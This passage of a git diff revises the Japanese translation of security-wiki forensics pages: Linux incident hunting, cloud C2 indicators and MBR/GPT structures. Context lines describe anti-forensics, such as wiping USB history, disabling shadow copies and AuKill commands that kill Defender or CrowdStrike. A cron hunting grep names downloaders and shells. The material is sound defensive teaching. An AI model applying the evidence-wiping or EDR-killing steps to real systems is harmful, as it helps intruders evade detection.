(Regedit.exe)。 2. `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`に移動します。 @@ -109,7 +109,7 @@ NTFSボリュームからフォルダーが開かれるたびに、システム ### USB履歴の削除 -すべての**USBデバイスエントリ**は、PCまたはラップトップにUSBデバイスを接続するたびに作成されるサブキーを含む**USBSTOR**レジストリキーの下にWindowsレジストリに保存されます。このキーはここにあります`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`。**これを削除することで**USB履歴を削除します。\ +すべての**USBデバイスエントリ**は、PCまたはラップトップにUSBデバイスを接続するたびに作成されるサブキーを含む**USBSTOR**レジストリキーの下にWindowsレジストリに保存されます。このキーはここにあります`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`。**これを削除することで**、USB履歴を削除します。\ また、[**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html)ツールを使用して、削除したことを確認することもできます(および削除するために)。 USBに関する情報を保存する別のファイルは、`C:\Windows\INF`内の`setupapi.dev.log`ファイルです。これも削除する必要があります。 @@ -125,9 +125,9 @@ GUIを介して削除することも可能で、[https://www.ubackup.com/windows 1. Windowsスタートボタンをクリックした後、テキスト検索ボックスに「services」と入力してサービスプログラムを開きます。 2. リストから「Volume Shadow Copy」を見つけて選択し、右クリックしてプロパティにアクセスします。 -3. 「スタートアップの種類」ドロップダウンメニューから「無効」を選択し、変更を適用してOKをクリックして確認します。 +3. 「スタートアップの種類」ドロップダウンメニューから「無効」を選択し、変更を確認するために「適用」と「OK」をクリックします。 -シャドウコピーでコピーされるファイルの構成を変更することも可能で、レジストリ`HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`で行います。 +シャドウコピーでコピーされるファイルの構成を変更することも可能で、レジストリ`HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`で設定できます。 ### 削除されたファイルの上書き @@ -203,14 +203,14 @@ AuKill.exe -e "C:\\Program Files\\Windows Defender\\MsMpEng.exe" AuKill.exe -k CrowdStrike ``` ドライバーはその後削除され、最小限のアーティファクトが残ります。 -緩和策:Microsoftの脆弱なドライバーブロックリスト(HVCI/SAC)を有効にし、ユーザーが書き込み可能なパスからのカーネルサービスの作成に警告します。 +緩和策:Microsoftの脆弱なドライバーブロックリスト(HVCI/SAC)を有効にし、ユーザーが書き込み可能なパスからのカーネルサービスの作成を警告します。 --- ## Linuxアンチフォレンジックス:自己パッチとクラウドC2(2023–2025) ### 検出を減らすために妥協されたサービスを自己パッチする(Linux) -敵対者は、再利用を防ぎ、脆弱性に基づく検出を抑制するために、サービスを悪用した直後に「自己パッチ」を行うことが増えています。アイデアは、脆弱なコンポーネントを最新の正当なアップストリームバイナリ/JARに置き換えることで、スキャナーがホストをパッチ済みとして報告し、持続性とC2を維持することです。 +敵対者は、再利用を防ぎ、脆弱性に基づく検出を抑制するために、サービスを悪用した直後に「自己パッチ」を行うことが増えています。アイデアは、脆弱なコンポーネントを最新の正当なアップストリームバイナリ/JARに置き換えることで、スキャナーがホストをパッチ済みとして報告しつつ、持続性とC2を維持することです。 例:Apache ActiveMQ OpenWire RCE(CVE‑2023‑46604) - ポストエクスプロイト後、攻撃者はMaven Central(repo1.maven.org)から正当なJARを取得し、ActiveMQインストール内の脆弱なJARを削除し、ブローカーを再起動しました。 @@ -240,18 +240,18 @@ Forensic/hunting tips - RHEL/CentOS: `rpm -Va 'activemq*'` - パッケージマネージャーに所有されていないディスク上のJARバージョンや、バンド外で更新されたシンボリックリンクを探します。 - タイムライン: `find "$AMQ_DIR" -type f -printf '%TY-%Tm-%Td %TH:%TM %p\n' | sort` を使用して、ctime/mtimeを侵害ウィンドウと相関させます。 -- シェル履歴/プロセステレメトリ: 初期の悪用直後に `curl`/`wget` が `repo1.maven.org` や他のアーティファクトCDNに対しての証拠。 -- 変更管理: “パッチ”を適用したのは誰で、なぜ適用されたのかを検証し、パッチ版が存在するだけでは不十分です。 +- シェル履歴/プロセステレメトリ: 初期の悪用直後に `curl`/`wget` を `repo1.maven.org` または他のアーティファクトCDNに対して使用した証拠。 +- 変更管理: “パッチ”を適用したのは誰で、なぜ適用されたのかを検証し、パッチバージョンが存在するだけでは不十分です。 ### Cloud‑service C2 with bearer tokens and anti‑analysis stagers 観察されたトレードクラフトは、複数の長距離C2パスとアンチ分析パッケージングを組み合わせていました: - サンドボックス化や静的分析を妨げるためのパスワード保護されたPyInstaller ELFローダー(例:暗号化されたPYZ、`/_MEI*`の下での一時的な抽出)。 - インジケーター: `strings` ヒットの例として `PyInstaller`, `pyi-archive`, `PYZ-00.pyz`, `MEIPASS`。 - ランタイムアーティファクト: `/tmp/_MEI*` への抽出またはカスタム `--runtime-tmpdir` パス。 -- ハードコーディングされたOAuthベアラートークンを使用したDropboxバックアップC2 +- ハードコーディングされたOAuthベアラートークンを使用したDropboxバックアップC2。 - ネットワークマーカー: `api.dropboxapi.com` / `content.dropboxapi.com` で `Authorization: Bearer `。 - 通常ファイルを同期しないサーバーワークロードからDropboxドメインへのアウトバウンドHTTPSを探すために、プロキシ/NetFlow/Zeek/Suricataでハントします。 -- トンネリングを介した並行/バックアップC2(例:Cloudflare Tunnel `cloudflared`)、1つのチャネルがブロックされた場合でも制御を保持します。 +- トンネリングを介した並行/バックアップC2(例:Cloudflare Tunnel `cloudflared`)、1つのチャネルがブロックされた場合でも制御を維持します。 - ホストIOC: `cloudflared` プロセス/ユニット、`~/.cloudflared/*.json` の設定、Cloudflareエッジへのアウトバウンド443。 ### Persistence and “hardening rollback” to maintain access (Linux examples) @@ -272,7 +272,7 @@ grep -E '^\s*PermitRootLogin' /etc/ssh/sshd_config ```bash awk -F: '($7 ~ /bin\/(sh|bash|zsh)/ && $1 ~ /^(games|lp|sync|shutdown|halt|mail|operator)$/) {print}' /etc/passwd ``` -- クラウドC2にも接続するランダムで短い名前のビーコンアーティファクト(8文字のアルファベット)をディスクにドロップ: +- クラウドC2にも接続するランダムで短い名前のビーコンアーティファクト(8文字のアルファベット)をディスクにドロップします: - ハント: ```bash find / -maxdepth 3 -type f -regextype posix-extended -regex '.*/[A-Za-z]{8}$' \ diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md index c93e71512..1923fe965 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md @@ -6,7 +6,7 @@ ### 基本情報 -まず最初に、**良く知られたバイナリとライブラリが入った** **USB** を用意することをお勧めします(ubuntuを取得し、フォルダ _/bin_, _/sbin_, _/lib,_ と _/lib64_ をコピーするだけで済みます)。次に、USBをマウントし、これらのバイナリを使用するように環境変数を変更します: +まず最初に、**良く知られたバイナリとライブラリが入った** **USB** を用意することをお勧めします(ubuntuを取得し、フォルダ _/bin_, _/sbin_, _/lib,_ および _/lib64_ をコピーするだけで済みます)。次に、USBをマウントし、これらのバイナリを使用するように環境変数を変更します: ```bash export PATH=/mnt/usb/bin:/mnt/usb/sbin export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64 @@ -54,7 +54,7 @@ sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime" LiMEは3つの**フォーマット**をサポートしています: - Raw(すべてのセグメントが連結されたもの) -- Padded(rawと同じですが、右側のビットにゼロが追加されています) +- Padded(Rawと同じですが、右側のビットにゼロが追加されています) - Lime(メタデータ付きの推奨フォーマット) LiMEは、システムに保存する代わりに**ネットワーク経由でダンプを送信する**ためにも使用できます。例えば:`path=tcp:4444` @@ -64,11 +64,11 @@ LiMEは、システムに保存する代わりに**ネットワーク経由で #### シャットダウン まず最初に、**システムをシャットダウンする**必要があります。これは常に選択肢ではなく、時にはシステムが会社がシャットダウンできないプロダクションサーバーであることがあります。\ -システムをシャットダウンする方法は**2つ**あり、**通常のシャットダウン**と**「プラグを抜く」シャットダウン**です。最初の方法では、**プロセスが通常通り終了する**ことを許可し、**ファイルシステム**が**同期される**ことを可能にしますが、同時に**マルウェア**が**証拠を破壊する**可能性もあります。「プラグを抜く」アプローチは**情報の損失**を伴う可能性があります(メモリのイメージをすでに取得しているため、失われる情報はあまり多くありません)し、**マルウェアは何もできる機会がありません**。したがって、**マルウェアの可能性がある**と**疑う**場合は、システムで**`sync`** **コマンド**を実行し、プラグを抜いてください。 +システムをシャットダウンする方法は**2つ**あり、**通常のシャットダウン**と**「プラグを抜く」シャットダウン**です。最初の方法では、**プロセスが通常通り終了する**ことを許可し、**ファイルシステム**が**同期される**ことを可能にしますが、同時に**マルウェア**が**証拠を破壊する**可能性もあります。「プラグを抜く」アプローチは**情報の損失**を伴う可能性があります(メモリのイメージをすでに取得しているため、失われる情報はあまり多くありません)し、**マルウェアは何もできる機会がありません**。したがって、**マルウェアの可能性がある**と疑う場合は、システムで**`sync`** **コマンド**を実行し、プラグを抜いてください。 #### ディスクのイメージを取得する -**ケースに関連する何かにコンピュータを接続する前に**、それが**読み取り専用としてマウントされる**ことを確認することが重要です。情報を変更しないようにするためです。 +**ケースに関連する何かにコンピュータを接続する前に**、情報を変更しないように**読み取り専用でマウントされる**ことを確認することが重要です。 ```bash #Create a raw copy of the disk dd if= of= bs=512 @@ -153,10 +153,10 @@ malware-analysis.md DebianおよびRedHatシステムでインストールされたプログラムを効果的に検索するには、システムログやデータベースを活用し、一般的なディレクトリでの手動チェックを併用することを検討してください。 -- Debianの場合、_**`/var/lib/dpkg/status`**_および_**`/var/log/dpkg.log`**_を確認してパッケージインストールに関する詳細を取得し、`grep`を使用して特定の情報をフィルタリングします。 +- Debianの場合、_**`/var/lib/dpkg/status`**_および_**`/var/log/dpkg.log`**_を調査してパッケージインストールに関する詳細を取得し、`grep`を使用して特定の情報をフィルタリングします。 - RedHatユーザーは、`rpm -qa --root=/mntpath/var/lib/rpm`を使用してインストールされたパッケージのリストを取得できます。 -これらのパッケージマネージャーの外部で手動でインストールされたソフトウェアを明らかにするために、_**`/usr/local`**_、_**`/opt`**_、_**`/usr/sbin`**_、_**`/usr/bin`**_、_**`/bin`**_、および_**`/sbin`**_のようなディレクトリを探索します。ディレクトリリストとシステム固有のコマンドを組み合わせて、既知のパッケージに関連付けられていない実行可能ファイルを特定し、インストールされたすべてのプログラムの検索を強化します。 +これらのパッケージマネージャーの外部で手動でインストールされたソフトウェアを明らかにするために、_**`/usr/local`**_、_**`/opt`**_、_**`/usr/sbin`**_、_**`/usr/bin`**_、_**`/bin`**_、および_**`/sbin`**_のようなディレクトリを探索してください。ディレクトリリストとシステム固有のコマンドを組み合わせて、既知のパッケージに関連付けられていない実行可能ファイルを特定し、インストールされたすべてのプログラムの検索を強化します。 ```bash # Debian package and log details cat /var/lib/dpkg/status | grep -E "Package:|Status:" @@ -197,7 +197,7 @@ cat /var/spool/cron/crontabs/* \ ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ``` #### Hunt: Cron/Anacronの悪用と0anacronおよび疑わしいスタブ -攻撃者は、定期的な実行を確実にするために、各/etc/cron.*/ディレクトリに存在する0anacronスタブを編集することがよくあります。 +攻撃者は、定期的な実行を確保するために、各/etc/cron.*/ディレクトリに存在する0anacronスタブを編集することがよくあります。 ```bash # List 0anacron files and their timestamps/sizes for d in /etc/cron.*; do [ -f "$d/0anacron" ] && stat -c '%n %y %s' "$d/0anacron"; done @@ -205,7 +205,7 @@ for d in /etc/cron.*; do [ -f "$d/0anacron" ] && stat -c '%n %y %s' "$d/0anacron # Look for obvious execution of shells or downloaders embedded in cron stubs grep -R --line-number -E 'curl|wget|/bin/sh|python|bash -c' /etc/cron.*/* 2>/dev/null ``` -#### Hunt: SSHハードニングのロールバックとバックドアシェル +#### Hunt: SSHの強化のロールバックとバックドアシェル sshd_configやシステムアカウントシェルの変更は、アクセスを保持するための一般的なポストエクスプロイトです。 ```bash # Root login enablement (flag "yes" or lax values) @@ -217,7 +217,7 @@ awk -F: '($7 ~ /bin\/(sh|bash|zsh)/ && $1 ~ /^(games|lp|sync|shutdown|halt|mail| #### Hunt: Cloud C2 markers (Dropbox/Cloudflare Tunnel) - Dropbox APIビーコンは通常、HTTPS経由でapi.dropboxapi.comまたはcontent.dropboxapi.comを使用し、Authorization: Bearerトークンを使用します。 - サーバーからの予期しないDropboxの出口を探すために、proxy/Zeek/NetFlowでハントします。 -- Cloudflare Tunnel (`cloudflared`)は、アウトバウンド443経由でバックアップC2を提供します。 +- Cloudflare Tunnel(`cloudflared`)は、アウトバウンド443経由でバックアップC2を提供します。 ```bash ps aux | grep -E '[c]loudflared|trycloudflare' systemctl list-units | grep -i cloudflared @@ -226,14 +226,14 @@ systemctl list-units | grep -i cloudflared マルウェアがサービスとしてインストールされる可能性のあるパス: -- **/etc/inittab**: rc.sysinitのような初期化スクリプトを呼び出し、さらにスタートアップスクリプトに指示します。 -- **/etc/rc.d/** と **/etc/rc.boot/**: サービスのスタートアップ用スクリプトを含み、後者は古いLinuxバージョンで見られます。 -- **/etc/init.d/**: Debianのような特定のLinuxバージョンでスタートアップスクリプトを保存するために使用されます。 +- **/etc/inittab**: rc.sysinitのような初期化スクリプトを呼び出し、さらに起動スクリプトに指示します。 +- **/etc/rc.d/** と **/etc/rc.boot/**: サービス起動用のスクリプトを含み、後者は古いLinuxバージョンで見られます。 +- **/etc/init.d/**: Debianのような特定のLinuxバージョンで起動スクリプトを保存するために使用されます。 - サービスは、Linuxのバリアントに応じて **/etc/inetd.conf** または **/etc/xinetd/** を介しても有効化されることがあります。 - **/etc/systemd/system**: システムおよびサービスマネージャースクリプト用のディレクトリ。 - **/etc/systemd/system/multi-user.target.wants/**: マルチユーザーランレベルで起動すべきサービスへのリンクを含みます。 - **/usr/local/etc/rc.d/**: カスタムまたはサードパーティのサービス用。 -- **\~/.config/autostart/**: ユーザー固有の自動スタートアプリケーション用で、ユーザーをターゲットにしたマルウェアの隠れ場所になる可能性があります。 +- **\~/.config/autostart/**: ユーザー固有の自動起動アプリケーション用で、ユーザーをターゲットにしたマルウェアの隠れ場所になる可能性があります。 - **/lib/systemd/system/**: インストールされたパッケージによって提供されるシステム全体のデフォルトユニットファイル。 ### カーネルモジュール @@ -254,11 +254,11 @@ Linuxは、ユーザーログイン時にプログラムを自動的に実行す ## ログの調査 -Linuxシステムは、ユーザーの活動やシステムイベントをさまざまなログファイルを通じて追跡します。これらのログは、不正アクセス、マルウェア感染、その他のセキュリティインシデントを特定するために重要です。主なログファイルは以下の通りです: +Linuxシステムは、さまざまなログファイルを通じてユーザーの活動やシステムイベントを追跡します。これらのログは、不正アクセス、マルウェア感染、その他のセキュリティインシデントを特定するために重要です。主要なログファイルには以下が含まれます: -- **/var/log/syslog** (Debian) または **/var/log/messages** (RedHat): システム全体のメッセージや活動をキャプチャします。 -- **/var/log/auth.log** (Debian) または **/var/log/secure** (RedHat): 認証試行、成功したログインおよび失敗したログインを記録します。 -- `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` を使用して、関連する認証イベントをフィルタリングします。 +- **/var/log/syslog** (Debian) または **/var/log/messages** (RedHat): システム全体のメッセージと活動をキャプチャします。 +- **/var/log/auth.log** (Debian) または **/var/log/secure** (RedHat): 認証試行、成功したログインと失敗したログインを記録します。 +- `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` を使用して関連する認証イベントをフィルタリングします。 - **/var/log/boot.log**: システム起動メッセージを含みます。 - **/var/log/maillog** または **/var/log/mail.log**: メールサーバーの活動をログに記録し、メール関連サービスの追跡に役立ちます。 - **/var/log/kern.log**: カーネルメッセージを保存し、エラーや警告を含みます。 @@ -273,7 +273,7 @@ Linuxシステムは、ユーザーの活動やシステムイベントをさま - **/var/log/**: ここで予期しないログを常に確認してください。 > [!TIP] -> Linuxシステムのログと監査サブシステムは、侵入やマルウェアのインシデントで無効化または削除される可能性があります。Linuxシステムのログは、悪意のある活動に関する最も有用な情報を含むことが一般的であるため、侵入者はそれらを定期的に削除します。したがって、利用可能なログファイルを調査する際には、削除や改ざんの兆候を示すギャップや順序が乱れたエントリを探すことが重要です。 +> Linuxシステムのログと監査サブシステムは、侵入やマルウェアのインシデントで無効化または削除される可能性があります。Linuxシステムのログは、悪意のある活動に関する最も有用な情報を含むことが多いため、侵入者はそれらを定期的に削除します。したがって、利用可能なログファイルを調査する際には、削除や改ざんの兆候である可能性のあるギャップや順序が乱れたエントリを探すことが重要です。 **Linuxは各ユーザーのコマンド履歴を保持します**。これは以下に保存されます: @@ -287,28 +287,28 @@ Linuxシステムは、ユーザーの活動やシステムイベントをさま 追加の権限を付与できるファイルを確認してください: -- `/etc/sudoers` を確認して、予期しないユーザー権限が付与されていないか確認します。 -- `/etc/sudoers.d/` を確認して、予期しないユーザー権限が付与されていないか確認します。 -- `/etc/groups` を調べて、異常なグループメンバーシップや権限を特定します。 -- `/etc/passwd` を調べて、異常なグループメンバーシップや権限を特定します。 +- 予期しないユーザー権限が付与されている可能性があるため、`/etc/sudoers` を確認します。 +- 予期しないユーザー権限が付与されている可能性があるため、`/etc/sudoers.d/` を確認します。 +- 異常なグループメンバーシップや権限を特定するために、`/etc/groups` を調査します。 +- 異常なグループメンバーシップや権限を特定するために、`/etc/passwd` を調査します。 一部のアプリも独自のログを生成します: -- **SSH**: _\~/.ssh/authorized_keys_ と _\~/.ssh/known_hosts_ を調べて、不正なリモート接続を確認します。 +- **SSH**: 不正なリモート接続のために _\~/.ssh/authorized_keys_ と _\~/.ssh/known_hosts_ を調査します。 - **Gnomeデスクトップ**: Gnomeアプリケーションを介して最近アクセスされたファイルのために _\~/.recently-used.xbel_ を確認します。 -- **Firefox/Chrome**: _\~/.mozilla/firefox_ または _\~/.config/google-chrome_ でブラウザの履歴とダウンロードを確認し、疑わしい活動を探します。 +- **Firefox/Chrome**: 疑わしい活動のために _\~/.mozilla/firefox_ または _\~/.config/google-chrome_ でブラウザの履歴とダウンロードを確認します。 - **VIM**: アクセスされたファイルパスや検索履歴などの使用詳細のために _\~/.viminfo_ を確認します。 -- **Open Office**: 侵害されたファイルを示す可能性のある最近のドキュメントアクセスを確認します。 -- **FTP/SFTP**: 不正なファイル転送がないか _\~/.ftp_history_ または _\~/.sftp_history_ のログを確認します。 -- **MySQL**: 実行されたMySQLクエリを調査するために _\~/.mysql_history_ を調べ、不正なデータベース活動を明らかにします。 -- **Less**: 使用履歴を分析するために _\~/.lesshst_ を確認し、表示されたファイルや実行されたコマンドを含みます。 -- **Git**: リポジトリの変更を確認するために _\~/.gitconfig_ とプロジェクトの _.git/logs_ を調べます。 +- **Open Office**: 侵害されたファイルを示す可能性のある最近の文書アクセスを確認します。 +- **FTP/SFTP**: 不正なファイル転送の可能性があるため、_ \~/.ftp_history_ または _\~/.sftp_history_ のログを確認します。 +- **MySQL**: 実行されたMySQLクエリを調査するために _\~/.mysql_history_ を調査し、不正なデータベース活動を明らかにします。 +- **Less**: 表示されたファイルや実行されたコマンドを含む使用履歴のために _\~/.lesshst_ を分析します。 +- **Git**: リポジトリの変更のために _\~/.gitconfig_ とプロジェクトの _.git/logs_ を調査します。 ### USBログ -[**usbrip**](https://github.com/snovvcrash/usbrip) は、Linuxのログファイル(ディストリビューションに応じて `/var/log/syslog*` または `/var/log/messages*`)を解析してUSBイベント履歴テーブルを構築するために書かれた小さなソフトウェアです。 +[**usbrip**](https://github.com/snovvcrash/usbrip) は、Linuxのログファイル(ディストリビューションに応じて `/var/log/syslog*` または `/var/log/messages*`)を解析してUSBイベント履歴テーブルを構築するために純粋なPython 3で書かれた小さなソフトウェアです。 -使用されたすべてのUSBを**知ることは興味深い**ことであり、"違反イベント"(そのリストに含まれていないUSBの使用)を見つけるために、承認されたUSBのリストがあるとさらに有用です。 +使用されたすべてのUSBを知ることは興味深く、"違反イベント"(そのリストに含まれていないUSBの使用)を見つけるために、承認されたUSBのリストがあるとさらに有用です。 ### インストール ```bash @@ -327,7 +327,7 @@ More examples and info inside the github: [https://github.com/snovvcrash/usbrip] ## ユーザーアカウントとログオン活動のレビュー -_**/etc/passwd**_、_**/etc/shadow**_、および**セキュリティログ**を調べて、知られている不正なイベントに近い位置で作成または使用された異常な名前やアカウントを探します。また、sudoのブルートフォース攻撃の可能性も確認してください。\ +_**/etc/passwd**_、_**/etc/shadow**_、および**セキュリティログ**を調べて、知られている不正なイベントに近い位置で作成または使用された異常な名前やアカウントを探します。また、可能なsudoブルートフォース攻撃を確認してください。\ さらに、_**/etc/sudoers**_や_**/etc/groups**_のようなファイルをチェックして、ユーザーに与えられた予期しない特権を確認します。\ 最後に、**パスワードなし**または**簡単に推測できる**パスワードを持つアカウントを探します。 @@ -335,18 +335,18 @@ _**/etc/passwd**_、_**/etc/shadow**_、および**セキュリティログ**を ### マルウェア調査におけるファイルシステム構造の分析 -マルウェアインシデントを調査する際、ファイルシステムの構造は重要な情報源であり、イベントの順序やマルウェアの内容を明らかにします。しかし、マルウェアの作者は、ファイルのタイムスタンプを変更したり、データストレージのためにファイルシステムを避けたりするなど、この分析を妨げる技術を開発しています。 +マルウェアインシデントを調査する際、ファイルシステムの構造は重要な情報源であり、イベントの順序やマルウェアの内容を明らかにします。しかし、マルウェアの著者は、ファイルのタイムスタンプを変更したり、データストレージのためにファイルシステムを回避したりするなど、この分析を妨げる技術を開発しています。 これらのアンチフォレンジック手法に対抗するためには、以下が重要です: - **Autopsy**のようなツールを使用してイベントのタイムラインを視覚化するために、徹底的なタイムライン分析を行うこと、または**Sleuth Kit**の`mactime`を使用して詳細なタイムラインデータを取得します。 - 攻撃者によって使用されるシェルやPHPスクリプトを含む可能性のある、システムの$PATH内の予期しないスクリプトを調査します。 -- **/dev**内の異常なファイルを調べます。通常は特別なファイルが含まれていますが、マルウェア関連のファイルが存在する可能性があります。 -- **.. **(ドットドットスペース)や**..^G**(ドットドットコントロール-G)などの名前を持つ隠しファイルやディレクトリを検索し、悪意のあるコンテンツが隠されている可能性があります。 -- コマンドを使用してsetuid rootファイルを特定します:`find / -user root -perm -04000 -print` これは、攻撃者によって悪用される可能性のある昇格された権限を持つファイルを見つけます。 -- inodeテーブル内の削除タイムスタンプをレビューして、大量のファイル削除を特定し、ルートキットやトロイの木馬の存在を示す可能性があります。 -- 1つの悪意のあるファイルを特定した後、近くの悪意のあるファイルのために連続したinodeを検査します。これらは一緒に配置されている可能性があります。 -- 最近変更されたファイルがマルウェアによって変更される可能性があるため、一般的なバイナリディレクトリ(_/bin_、_/sbin_)を確認します。 +- 通常は特別なファイルを含む`/dev`を調べますが、マルウェア関連のファイルが存在する可能性があります。 +- 悪意のあるコンテンツを隠す可能性のある、名前が「.. 」(ドットドットスペース)や「..^G」(ドットドットコントロール-G)の隠しファイルやディレクトリを検索します。 +- 攻撃者によって悪用される可能性のある、昇格された権限を持つファイルを見つけるために、次のコマンドを使用してsetuid rootファイルを特定します:`find / -user root -perm -04000 -print` +- ルートキットやトロイの木馬の存在を示す可能性のある、大量のファイル削除を示すためにinodeテーブルの削除タイムスタンプをレビューします。 +- 1つの悪意のあるファイルを特定した後、近くにある悪意のあるファイルのために連続したinodeを検査します。これらは一緒に配置されている可能性があります。 +- マルウェアによって変更される可能性があるため、最近変更されたファイルのために一般的なバイナリディレクトリ(_/bin_、_/sbin_)を確認します。 ````bash # List recent files in a directory: ls -laR --sort=time /bin``` @@ -355,7 +355,7 @@ ls -laR --sort=time /bin``` ls -lai /bin | sort -n``` ```` > [!TIP] -> 注意してください、**攻撃者**は**時間**を**変更**して**ファイルを正当なものに見せる**ことができますが、**inode**を**変更**することはできません。同じフォルダー内の他のファイルと**同時に**作成および変更されたことを示す**ファイル**があり、しかし**inode**が**予期せず大きい**場合、その**ファイルのタイムスタンプが変更された**ことになります。 +> 注意してください、**攻撃者**は**時間**を**変更**して**ファイルを正当なものに見せる**ことができますが、**inode**を**変更**することはできません。もし**ファイル**が同じフォルダ内の他のファイルと**同時に**作成および変更されたことを示しているが、**inode**が**予期せず大きい**場合、その**ファイルのタイムスタンプが変更された**ことになります。 ## 異なるファイルシステムバージョンの比較 @@ -367,7 +367,7 @@ ls -lai /bin | sort -n``` ```bash git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/ ``` -- **変更された内容**、特定の行を無視して変更をリストします: +- **変更された内容**、特定の行を無視しながら変更をリストします: ```bash git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time" ``` @@ -391,8 +391,8 @@ git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/ - [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf) - [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) - [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203) -- **書籍: Linuxシステムのマルウェアフォレンジックフィールドガイド: デジタルフォレンジックフィールドガイド** +- **書籍: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides** -- [Red Canary – 永続性のためのパッチ: DripDropper Linuxマルウェアがクラウドを通じて移動する方法](https://redcanary.com/blog/threat-intelligence/dripdropper-linux-malware/) +- [Red Canary – Patching for persistence: How DripDropper Linux malware moves through the cloud](https://redcanary.com/blog/threat-intelligence/dripdropper-linux-malware/) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md index 6a1e6ab33..9f575fc33 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -4,12 +4,12 @@ ## パーティション -ハードドライブまたは**SSDディスクは、データを物理的に分離するために異なるパーティションを含むことができます**。\ -ディスクの**最小**単位は**セクター**(通常は512Bで構成される)です。したがって、各パーティションのサイズはそのサイズの倍数である必要があります。 +ハードドライブまたは**SSDディスクは、データを物理的に分離する目的で異なるパーティションを含むことができます**。\ +ディスクの**最小**単位は**セクター**(通常は512Bで構成されています)です。したがって、各パーティションのサイズはそのサイズの倍数である必要があります。 ### MBR(マスターブートレコード) -これは**ブートコードの446Bの後のディスクの最初のセクターに割り当てられています**。このセクターは、PCにパーティションをどのように、どこからマウントするかを示すために重要です。\ +これは**ブートコードの446Bの後のディスクの最初のセクターに割り当てられています**。このセクターは、PCにどのパーティションをどこからマウントするかを示すために不可欠です。\ 最大で**4つのパーティション**を許可します(**アクティブ/ブート可能**なのは最大で**1つ**のみ)。ただし、より多くのパーティションが必要な場合は、**拡張パーティション**を使用できます。この最初のセクターの**最終バイト**はブートレコード署名**0x55AA**です。アクティブとしてマークできるパーティションは1つだけです。\ MBRは**最大2.2TB**を許可します。 @@ -38,18 +38,18 @@ MBRの**バイト440から443**の間には**Windowsディスク署名**が見 | ------------ | -------- | ---------------------------------------------------------- | | 0 (0x00) | 1 (0x01) | アクティブフラグ (0x80 = ブート可能) | | 1 (0x01) | 1 (0x01) | 開始ヘッド | -| 2 (0x02) | 1 (0x01) | 開始セクター(ビット0-5);シリンダの上位ビット(6-7) | +| 2 (0x02) | 1 (0x01) | 開始セクター (ビット0-5); シリンダの上位ビット (6-7) | | 3 (0x03) | 1 (0x01) | 開始シリンダの最下位8ビット | | 4 (0x04) | 1 (0x01) | パーティションタイプコード (0x83 = Linux) | | 5 (0x05) | 1 (0x01) | 終了ヘッド | -| 6 (0x06) | 1 (0x01) | 終了セクター(ビット0-5);シリンダの上位ビット(6-7) | +| 6 (0x06) | 1 (0x01) | 終了セクター (ビット0-5); シリンダの上位ビット (6-7) | | 7 (0x07) | 1 (0x01) | 終了シリンダの最下位8ビット | -| 8 (0x08) | 4 (0x04) | パーティション前のセクター(リトルエンディアン) | +| 8 (0x08) | 4 (0x04) | パーティション前のセクター (リトルエンディアン) | | 12 (0x0C) | 4 (0x04) | パーティション内のセクター | -LinuxでMBRをマウントするには、最初に開始オフセットを取得する必要があります(`fdisk`と`p`コマンドを使用できます) +LinuxでMBRをマウントするには、まず開始オフセットを取得する必要があります(`fdisk`と`p`コマンドを使用できます) -![](<../../../images/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../../images/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) その後、次のコードを使用します。 ```bash @@ -98,26 +98,26 @@ GUIDパーティションテーブル、通称GPTは、MBR(マスターブー | 0 (0x00) | 8バイト | シグネチャ ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h または 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#_note-8)リトルエンディアンマシン上) | | 8 (0x08) | 4バイト | バージョン 1.0 (00h 00h 01h 00h) for UEFI 2.8 | | 12 (0x0C) | 4バイト | ヘッダーサイズ(リトルエンディアン、バイト単位、通常は5Ch 00h 00h 00hまたは92バイト) | -| 16 